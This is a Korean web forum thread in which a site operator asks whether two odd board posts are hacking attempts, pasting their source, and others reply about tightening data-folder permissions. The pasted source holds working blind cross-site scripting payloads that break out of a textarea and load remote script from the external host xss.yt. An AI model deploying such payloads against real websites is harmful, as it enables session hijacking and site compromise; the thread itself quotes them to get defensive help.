해킹 시도인가?
안녕하세요.
제가 운영하는 사이트 게시판에
요 며칠동안 2번의 이상한 글이 올라왔는데.
아래와 같은 소스가 있습니다.
해킹 시도 인가요?
그누보드 최신으로 업데이트 해 둬서 아직 뚫린것 같진 않은데..
어떻게 조치하는게 좋을까요?
. </tExtArEa>'"><sCRiPt sRC=//xss.yt/Y67I></sCrIpT>
</tEXtArEa>'"><img src=# id=xssyou style=display:none onerror=eRequest::post(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22https%3A%2F%2Fxss.yt%2FY67I%22%2BMath.random%28%29%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source));//>
|
댓글을 작성하시려면 로그인이 필요합니다.
댓글 8개
일단 data 폴더 권한부터 강화하시고 외부에 파일업로드 못하게 막아놓으세요
data 폴더 권한강화라고 하시면 data 권한을 어떻게 줘야하는건가요?
그 밑에 폴더들도 함께 줘야하는 건지? 특정 폴더만 주는건지? 755로 줘야 하는건지?
잘 몰라서 그런데 조금만 구체적으로 설명 해 주실 수 있을까요?
https://inpa.tistory.com/entry/LINUX-%F0%9F%93%9A-%ED%8C%8C%EC%9D%BC-%EA%B6%8C%ED%95%9C-%EC%86%8C%EC%9C%A0%EA%B6%8C%ED%97%88%EA%B0%80%EA%B6%8C-%F0%9F%92%AF-%EC%A0%95%EB%A6%AC
권한 설정및 방법은 알고 있습니다.
제가 궁금한 것은 어떤 디렉토리를 변경하면 될까요?
1) data 폴더만?
2) data 폴더와 그 아래 폴더 전체?
3) data 안의 특정폴더?
4) data 안의 특정 파일?
의견 감사합니다.